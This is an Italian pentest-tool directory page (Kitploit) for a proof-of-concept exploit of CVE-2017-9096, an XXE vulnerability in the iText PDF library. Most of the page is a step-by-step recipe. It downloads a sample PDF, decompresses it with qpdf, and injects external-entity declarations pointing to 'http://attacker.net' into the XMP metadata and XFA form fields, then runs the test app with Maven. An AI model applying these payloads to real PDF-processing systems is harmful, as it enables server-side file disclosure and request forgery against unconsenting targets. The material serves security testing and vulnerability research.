Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2017-9096-iText-XXE | Kitploit
Strumenti/GitHubGitHub/jakabakos/cve-2017-9096-itext-xxe
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebFuzzingPenetration Testing
GitHubjakabakos/cve-2017-9096-itext-xxe

CVE-2017-9096-iText-XXE

Vedi Repository
1334 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2017-9096

1. Creare il PDF malevolo contenente XXE

Ottieni un PDF contenente un modulo:

root@kitploit:~
wget https://www.pdfscripting.com/public/FreeStuff/PDFSamples/ModifySubmit_Example.pdf -O input.pdf

Decomprimi il PDF

Per farlo, devi decomprimere il PDF con qpdf --qdf --object-streams=disable input.pdf output.pdf; poi puoi modificare il PDF con un editor di testo e aggiungere XML malevolo.

Aggiungi le entità esterne

Puoi inserire XEE nei metadati XMP alla riga 77:

root@kitploit:~
stream
<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?>
<!DOCTYPE foo [ <!ENTITY xxe2 SYSTEM "http://attacker.net" > ]>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.0-c321 44.398116, Tue Aug 04 2009 14:24:39">

E ovviamente inserisci anche il riferimento da qualche parte, ad esempio alla riga 88:

root@kitploit:~
<xap:CreatorTool>Adobe LiveCycle Designer 8.0 &xxe2;</xap:CreatorTool>

Puoi anche aggiungere una XXE comune al file. Vedi questa parte nel documento originale (inizia alla riga 740):

root@kitploit:~
stream
<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
endstream
endobj

Modificala come segue:

root@kitploit:~
stream
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://attacker.net" > ]>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
endstream
endobj

Quindi, aggiungi semplicemente il riferimento da qualche parte, ad esempio al campo City (riga 1845 nel documento decompresso originale). Cambia questo:

root@kitploit:~
<text
>City:</text
></value
>

Con questo:

root@kitploit:~
<text
>City:</text
><xxe>&xxe;</xxe></value
>

Trovi anche il PDF patchato contenente entrambe le XXE in questo repository (output_with_xxe.pdf).

2. Esegui l'attacco

Esegui l'app Java per testare il PDF con mvn clean compile exec:java.

Scarica lo strumento